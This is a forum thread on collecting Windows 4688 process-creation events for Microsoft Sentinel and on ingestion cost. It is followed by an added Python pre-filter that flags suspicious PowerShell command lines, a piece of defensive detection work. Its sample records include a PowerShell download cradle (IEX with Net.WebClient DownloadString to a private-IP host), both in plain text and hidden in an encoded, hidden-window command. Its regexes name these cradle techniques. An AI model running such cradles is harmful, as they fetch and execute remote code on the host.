ford8k
Nov 04, 2019, Copper Contributor
Log sources for process creation (4688) events from endpoints
Hi, I noticed that lots of the use cases in Sentinel are driven by process creation events - 4688 in the Security event log; suspicious PowerShell command lines, for example. Is Microsoft's id...
AdiGrio
Nov 17, 2019, Brass Contributor
Not a solution, but just sharing my thoughts...
Capturing all the process creation events from ALL endpoints would be prohibitive from a cost perspective. For this reason, I'm only considering deploying the agent on endpoints with suspicious behavior, though this is not an optimal approach. Relying on Defender ATP is not an option, as many of our customers have significant investments in endpoint protection and replacing them with Defender ATP would be a long sales and engineering effort. As it is, we need to balance the costs of ingesting this data vs. the increase in security posture.
Regards,
Adrian Grigorof
Managed Sentinel Inc.
http://www.managedsentinel.com
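The question asks where 4688 events feed the "suspicious PowerShell command line" use cases, and the reply points out that shipping every 4688 from every endpoint is too expensive. The following is an added example, written for this page and not code from either poster, Microsoft Sentinel or Managed Sentinel, that shows both halves: what a command-line check over 4688 records looks like, and how much of the stream such a check keeps when run as a pre-filter before ingestion. The five records are constructed for the example; their field names (NewProcessName, CommandLine, ParentProcessName) mirror the Security log's 4688 fields as Sentinel exposes them, and the detection rules, thresholds and the hypothetical `triage()` wrapper are assumptions made here, not a published rule set.

```python
import base64
import re
from pathlib import PureWindowsPath

# Hosts whose command lines we inspect; everything else passes through unexamined.
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# Office binaries spawning PowerShell are a classic macro/phishing pattern.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...);
# the payload is base64 of the script text encoded as UTF-16LE.
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"-w[a-z]*\s+hidden", re.I)
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|\biex\b|invoke-expression",
    re.I,
)

# Constructed test payload for the encoded-command case (assumption: a typical download cradle).
PAYLOAD_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/s.ps1')"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD_SCRIPT.encode("utf-16le")).decode("ascii")

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"

# Constructed sample of 4688 records (not real telemetry, not from the thread).
SAMPLE_4688 = [
    {"Computer": "ws01", "NewProcessName": r"C:\Windows\System32\svchost.exe",
     "ParentProcessName": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},
    {"Computer": "ws01", "NewProcessName": WINWORD,
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": '"WINWORD.EXE" /n "C:\\Users\\a\\invoice.docx"'},
    # Ordinary admin script: -ExecutionPolicy Bypass and -File are left alone here to keep volume down.
    {"Computer": "ws02", "NewProcessName": PS_EXE,
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\ops\\inventory.ps1"},
    # Office-spawned, hidden window, encoded command hiding a download cradle.
    {"Computer": "ws02", "NewProcessName": PS_EXE,
     "ParentProcessName": WINWORD,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD},
    # Plain-text download cradle.
    {"Computer": "ws03", "NewProcessName": PS_EXE,
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')\""},
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None


def analyze(event):
    """Return the list of reasons a 4688 record looks suspicious (empty list = benign/unexamined)."""
    reasons = []
    if PureWindowsPath(event["NewProcessName"]).name.lower() not in POWERSHELL_HOSTS:
        return reasons
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    # Match cradle indicators against the decoded script too, so -enc does not hide them.
    effective = cmd if decoded is None else cmd + "\n" + decoded
    if decoded is not None:
        reasons.append("encoded_command")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden_window")
    if CRADLE_RE.search(effective):
        reasons.append("download_cradle")
    if PureWindowsPath(event["ParentProcessName"]).name.lower() in OFFICE_PARENTS:
        reasons.append("office_parent")
    return reasons


def triage(events):
    """Pre-filter a batch of 4688 records: keep only those with at least one reason, with the reasons attached."""
    kept = [{**ev, "Reasons": analyze(ev)} for ev in events if analyze(ev)]
    return {"total": len(events), "kept": len(kept), "events": kept}


if __name__ == "__main__":
    result = triage(SAMPLE_4688)
    print(f"kept {result['kept']} of {result['total']} process creation events")
    for ev in result["events"]:
        print(ev["Computer"], ev["Reasons"], ev["CommandLine"][:60])
```

Two caveats a practitioner would want alongside this. First, none of it works unless the endpoints actually emit the command line: 4688 carries it only when the "Include command line in process creation events" policy (the ProcessCreationIncludeCmdLine_Enabled audit setting) is turned on, which is off by default. Second, a pre-filter like this is exactly the cost-versus-coverage trade the reply describes: the events it drops are gone, so anything outside the indicator list (here, the `-ExecutionPolicy Bypass` admin script) can no longer be hunted for after the fact.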